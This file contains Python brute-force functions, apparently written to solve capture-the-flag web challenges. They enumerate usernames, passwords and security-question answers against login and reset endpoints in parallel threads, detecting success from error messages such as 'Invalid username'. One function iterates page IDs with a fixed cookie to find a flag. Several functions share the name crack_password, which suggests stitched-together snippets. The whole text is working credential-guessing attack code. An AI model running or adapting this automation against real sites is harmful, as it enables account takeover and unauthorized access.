def crack_username(ip, instance_id): """ Enumerates common usernames and returns the valid ones after trying. :param ip: :param instance_id: :return: """ path = "/".join((instance_id, ENDPOINT)) req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS) regex = r">Invalid username<" return h.parallel_attack( req_template, generate_uname_req, f(regex, True), data_file="uname_list.txt", threads=20, )
def crack_password(ip, instance_id, username): """ Enumerates common passwords and returns the valid ones after trying. A valid username is required. :param ip: :param instance_id: :param username: :return: """ path = "/".join((instance_id, ENDPOINT_LOGIN)) req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS) regex = r"Combination is invalid" passwd_req_gen = get_passwd_func(username) return h.parallel_attack( req_template, passwd_req_gen, f(regex, True), data_file="uname_list.txt", threads=10, )
def crack_security_question(ip, instance_id, user_hash): """ Enumerates common answers to a security question and returns the valid ones after trying. A valid user hash is required. :param ip: :param instance_id: :param user_hash: :return: """ path = "/".join((instance_id, ENDPOINT_RESET)) req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS) regex = r"Invalid answer" reset_req_gen = get_reset_func(user_hash) return h.parallel_attack( req_template, reset_req_gen, f(regex, True), data_file="uname_list.txt", threads=10, )
def crack_password(ip, instance_id, username): """ Enumerates common passwords and returns the valid ones after trying. A valid username is required. :param ip: :param instance_id: :param username: :return: """ path = "/".join((instance_id, ENDPOINT)) req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS) regex = r">Invalid password<" passwd_req_gen = get_passwd_func(username) # Use the same common word list like username. # A real password list is probably more suited for cracking a real application. return h.parallel_attack( req_template, passwd_req_gen, f(regex, True), data_file="uname_list.txt", threads=20, )
def search_secret_page(ip, instance_id, max_page_num): """ Iterates and seeks for the secret page with a flag, returns the page ID if found. :param ip: :param instance_id: :param max_page_num: :return: """ if max_page_num < 1: max_page_num = 10 sequence = list(range(0, max_page_num + 1)) path = "/".join((instance_id, ENDPOINT)) cookies = {"id": "c81e728d9d4c2f636f067f89cc14862c"} req_template = HttpRequest(ip, method=HttpMethod.GET, path=path, cookies=cookies) regex = r"\^FLAG\^" return h.parallel_attack(req_template, generate_page_req, f(regex, False), sequence=sequence, threads=5)
def crack_password(ip, instance_id, username): """ Enumerates common passwords and returns the valid ones after trying. A valid username is required. :param ip: :param instance_id: :param username: :return: """ path = "/".join((instance_id, ENDPOINT)) query_params = {"page": "sign_in.php"} req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS, params=query_params) regex = r"wrong username" passwd_req_gen = get_passwd_func(username) return h.parallel_attack( req_template, passwd_req_gen, f(regex, True), data_file="uname_list.txt", threads=10, )